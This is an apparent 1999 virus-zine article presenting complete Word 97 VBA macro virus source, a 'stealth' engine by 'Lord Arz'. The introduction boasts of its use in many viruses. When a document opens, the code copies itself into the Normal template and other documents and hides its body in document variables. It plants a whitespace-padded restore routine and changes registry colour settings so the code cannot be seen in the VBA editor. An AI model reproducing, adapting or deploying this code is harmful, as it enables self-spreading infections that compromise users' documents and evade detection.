<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

		   STEALTH THIS DOCUMENT INFECTION ENGINE

  <----------/\--------------------------------------------/\----------->


    The STDIE is a stealth version of TDIE, a short and fast system to 
infect the class "This Document" in Word 97 documents. 75% of my viruses 
base on it, and I already saw new viruses, wich used TDIE.

    Now, STDIE has a short but effective stealth routine, wich allows the
virus to infect and hide without a big loss of time. When the virus is 
active, it can not be exported!! (in all 1.x versions) In 1.2 the virus 
moves the code out of the screen and hides in the background of the VB 
Editor. (funny ain't it ??) How ? There doesn't exist any function to
manipulate the colorset, but in the system registry, there is an entry 
where the colors are stored.

    All TDIEs are near to 100% compatible with other code, or very easy 
become compatible.

    Regards,

     Lord Arz
     http://members.tripod.com/Lord_Arz/

 ' This is a comment!	
<-------------------------------[code starts here]------------------------>

Private Sub Document_Open()

Rem + - - - - - - - - - - - - - - - - - - - - - +
Rem | Stealth This Document Infection Engine    |
Rem | fast and 98 % stealth AND class infection |
Rem |                                           |
Rem | TDIE by Lord Arz      (Lord_Arz@gmx.net)  |
Rem + - - - - - - - - - - - - - - - - - - - - - +

On Error Resume Next    'catch all errors
ResetMe = String(5, Chr(13))    'generate stealth

ResetMe = ResetMe & String(300, "   ") _
	   & "Private Sub Document_Close(): "   'recover code

ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "   'recover code

'This here is one long line!!!

ResetMe = ResetMe & "End Sub"   'recover code

For x = 1 To ActiveDocument.Variables.Count   'clear variables
    ActiveDocument.Variables(x).Delete
Next x

For x = 1 To Normal.ThisDocument.Variables.Count   'clear variables
    Normal.ThisDocument.Variables(x).Delete
Next x

With ThisDocument.VBProject.VBComponents(1).CodeModule  'read virus code
    VCC = .Lines(1, .CountOfLines)
End With

With ActiveDocument.VBProject.VBComponents(1).CodeModule 
    .DeleteLines 1, .CountOfLines 'delete code in Doc
    .InsertLines 1, ResetMe 'insert stealth
End With

With Normal.ThisDocument.VBProject.VBComponents(1).CodeModule 
    .DeleteLines 1, .CountOfLines 'delete code in Normal
    .InsertLines 1, ResetMe 'insert stealth
End With

ActiveDocument.Variables.Add (Chr(65)), VCC   'store code in variable area 
					      'of Doc

Normal.ThisDocument.Variables.Add (Chr(65)), VCC    'store code in variale
						    'area of Normal

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"    
	'change background colors

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"  
	'change code colors
End Sub

<-----------------------------[code ends here]---------------------------->


  <----------\/--------------------------------------------\/----------->

        	 SPECIAL THANKS TO LORD ARZ FOR THIS CODE

<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
